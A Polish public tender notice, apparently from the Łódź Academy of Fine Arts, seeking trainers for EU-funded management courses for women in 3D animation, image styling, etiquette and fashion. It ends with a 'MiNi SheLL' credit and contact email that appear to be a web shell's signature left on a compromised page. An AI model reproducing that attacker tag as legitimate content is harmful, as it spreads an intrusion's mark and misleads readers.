5	5. Przeprowadzenie wykładów z zakresu Projektowania interaktywnych prezentacji i wydawnictw multimedialnych
	Dwóch wykładowców posiadających:
- minimum tytuł magistra
-Opracowanie minimum 3 realizacji internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
-prowadzeniem szkolenia lub kursu w zakresie tematu dotyczącego niniejszego szkolenia 

6	6. Przeprowadzenie ćwiczeń z zakresu Podstawy cyfrowej obróbki obrazu
Dwóch wykładowców posiadających:
- minimum tytuł magistra
-	Opracowanie minimum 3 realizacji internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
-prowadzeniem szkolenia lub kursu w zakresie tematu dotyczącego niniejszego szkolenia 

7	7. Przeprowadzenie ćwiczeń z zakresu Korekcja i retusz reklamowy  	Dwóch wykładowców posiadających:
- minimum tytuł magistra
-	Opracowanie minimum 3 realizacji internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
-prowadzeniem szkolenia lub kursu w zakresie tematu dotyczącego niniejszego szkolenia 

8	8. 
Przeprowadzenie wykładów i ćwiczeń z zakresu: Dress code - ubiór korporacyjny, typy sylwetek, ubiór w filmowym kadrze - psychologia koloru, tendencje w modzie	Jednego wykładowcę (trenera/coacha) posiadającego:
- tytuł magistra sztuki,
- minimum 5-letnie doświadczenie w pracy dydaktycznej na poziomie akademickim,
- doświadczenie w zakresie współpracy z min. 5 firmami na stanowisku projektanta,
- doświadczenie w pracy jako stylista,
- przeprowadzenie min. 7 stylizacji (w tym do katalogów, magazynów, sesji zdjęciowych, pokazów mody)
- doświadczenie w pracy w przemyśle odzieżowym,
- doświadczenie w opracowaniu i poprowadzeniu szkoleń z zakresu ubioru, mody czy
tendencji w modzie,
- działalnością badawczą w zakresie Dress Code,
- doświadczenie w reżyserii i produkcji pokazów mody.

9	9. Przeprowadzenie ćwiczeń Pt. Makijaż jako narzędzie kreacji wizerunku	Jednego wykładowcę (trenera/coacha) posiadającego:
-	wykształcenie wyższe
-	doświadczenie we współpracy z mediami w zakresie charakteryzacji, wizażu i stylizacji
-	doświadczenie w wykonywaniu makijażu/charakteryzacji przy produkcji filmowej (minimum 3)
-	doświadczenie w wykonywaniu makijażu/charakteryzacji przy kampaniach reklamowych telewizyjnych (minimum 20)
-	doświadczenie w wykonywaniu makijażu/charakteryzacji przy sesjach zdjęciowych reklamowych (minimum 20)
-	doświadczenie w wykonywaniu makijażu/charakteryzacji przy sesjach zdjęciowych dla firm odzieżowych (minimum 10)
-	doświadczenie przy kreowaniu wizerunku osoby publicznej uwzględniając   świat rozrywki, filmu, polityki (minimum 10 zleceń).

10	10. 
Przeprowadzenie wykładów i ćwiczeń z zakresu obsługi spotkań biznesowych, etapów prowadzenia i organizacji spotkań biznesowych, zasad profesjonalnej obsługi klientow, etykiety, etykiety, zasad savoir vivre w życiu zawodowym	Jednego wykładowcę (trenera/coacha) posiadającego:
wykształcenie:
-	wyższe

doświadczenie zawodowe:
-	udokumentowane min. 10 letnie doświadczenie zawodowe na stanowiskach menedżerskich 
w branży odzieżowej
-	udokumentowane min. 5 letnie doświadczenie pedagogiczne

doświadczenie szkoleniowe:
-	min. 10 letnie doświadczenie w prowadzeniu szkoleń, warsztatów, treningów
-	min. 5 letnie doświadczenie w prowadzeniu coachingów warsztatowych
-	min. 4 letnie doświadczenie w prowadzeniu coachingów rozwojowych dla kadry menadżerskiej
-	przygotowywanie projektów, programów szkoleniowych
-	analiza potrzeb szkoleniowych
-	ocena i raportowanie

doświadczenie menedżerskie:
-	min. 10 letnie doświadczenie w zarządzaniu zespołem
-	realizacja celów strategicznych firmy, zarządzanie projektami
-	pozyskiwanie źródeł finansowania

certyfikaty:
-	CoachWise-Essentials Program
-	Mini MBA - Polsko Amerykańskie Centrum Zarządzania
-	Negocjacje - Polsko Amerykańskie Centrum Zarządzania

11	11. Przeprowadzenie sesji fotograficznej nt Typy kadrowania fotografii - który profil jest lepszy
	Jednego wykładowcę (trenera/coacha) posiadającego:
-	osoba posiadająca wykształcenie wyższe artystyczne z zakresu fotografii
-	w pełni wyposażone studio fotograficzne na terenie miasta Łodzi 
-	posiadające cykloramę o wymiarach 5/6/4 m
-	powierzchnia: minimum 200m2 
12	12. Przeprowadzenie wykładów i ćwiczeń nt. Moda przemija, styl pozostaje	Jednego wykładowcę (trenera/coacha) posiadającego:
posiadającego 
-	wykształcenie wyższe,
-	doświadczenie jako krytyk mody,
-	doświadczenie jako dziennikarz mody,
-	doświadczenie jako autor rubryk o modzie oraz wydawnictw modowych,
-	minimum 15 lat pracy w branży mody
-	nagrody liczące się w branży modowej
-	doświadczenie w prowadzeniu szkoleń i warsztatów z zakresu  wdzięku, stylu 
-	doświadczenie we współtworzeniu i prowadzeniu programów  telewizyjnych dla kobiet

13	13. Przeprowadzenie wykładów i ćwiczeń z zakresu nt. Z modą przez xx wiek
	Jednego wykładowcę (trenera/coacha) posiadającego:
posiadającego 

-	wykształcenie wyższe z zakresu historii sztuki
-	doświadczenie jako wykładowca w uczelniach wyższych z zakresu historii ubioru oraz zagadnień mody XX wieku 



Na potwierdzenie spełnienia powyższych warunku Wykonawca zobowiązany jest przedstawić wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich wykształcenia, doświadczenia oraz informacją o podstawie do dysponowania tymi osobami - według załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1) Wypełniony Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ, 
2) Dokumenty i oświadczenia Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu - zgodnie z pkt 9, 11 i 12 niniejszej SIWZ,
3) Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
5) Pozostałe dokumenty wymienione w pkt 9, 11, 12 do SIWZ.
Zalecane przez Zamawiającego jest złożenie w ofercie spisu treści z wyszczególnieniem ilości stron wchodzących w skład oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie zamówienia publicznego, w toku jej realizacji:
1.	Wszelkie zmiany umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa.
2.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy wskutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu. 
3.	Zmiana podyktowana jest okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy.
4.	Wydłużenie terminu płatności za realizację zadania do czasu otrzymania środków z Instytucji Zarządzającej. W przypadku nieotrzymania środków z Instytucji Zarządzającej, Zamawiający w terminie 3 dni przed upływem terminu płatności poinformuje Wykonawcę o możliwości przedłużenia terminu płatności. Maksymalny termin przedłużenia terminu płatności to 3 miesiące licząc od określonej daty płatności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.asp.lodz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 10:00, miejsce: Oferty należy złożyć w siedzibie Zamawiającego- ul. Wojska Polskiego 121, w pok. 41, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Kwalifikacje i wiedza to nasza broń kobieca współfinansowany ze środków 
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego

Program Operacyjny Kapitał Ludzki Priorytet VIII Regionalne kadry gospodarki,
Działanie 8.1 Rozwój pracowników i przedsiębiorstw w regionie Poddziałanie 8.1.1 Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie wykładów Podstawy technologii multimedialnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie wykładów Podstawy grafiki i animacji 3D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie  ćwiczeń z zakresu Zaawansowane techniki modelowania i animacji 3D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie  ćwiczeń z zakresu VFX, postprodukcja i efekty specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie wykładów z zakresu: Projektowanie interaktywnych prezentacji i wydawnictw multimedialnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeprowadzenie  ćwiczeń z zakresu: Podstawa cyfrowej obróbki obrazu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeprowadzenie  ćwiczeń z zakresu: Korekcja i retusz reklamowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeprowadzenie wykładów i ćwiczeń z zakresu: Dress code - ubiór korporacyjny, typy sylwetek, ubiór w filmowym kadrze - psychologia koloru, tendencje w modzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2) Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeprowadzenie ćwiczeń pt. Makijaż jako narzędzie kreacji wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2) Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeprowadzenie wykładów i ćwiczeń z zakresu obsługi spotkań biznesowych, etapów prowadzenia i organizacji spotkań biznesowych, zasad profesjonalnej obsługi klientów, etykiety, etykiety, zasad savoir vivre w życiu zawodowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2) Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przeprowadzenie sesji fotograficznej Typy kadrowania fotografii - który profil jest lepszy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2) Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przeprowadzenie wykładów i ćwiczeń nt. Moda przemija, styl pozostaje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeprowadzenie wykładów i ćwiczeń z zakresu nt. Z modą przez xx wiek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com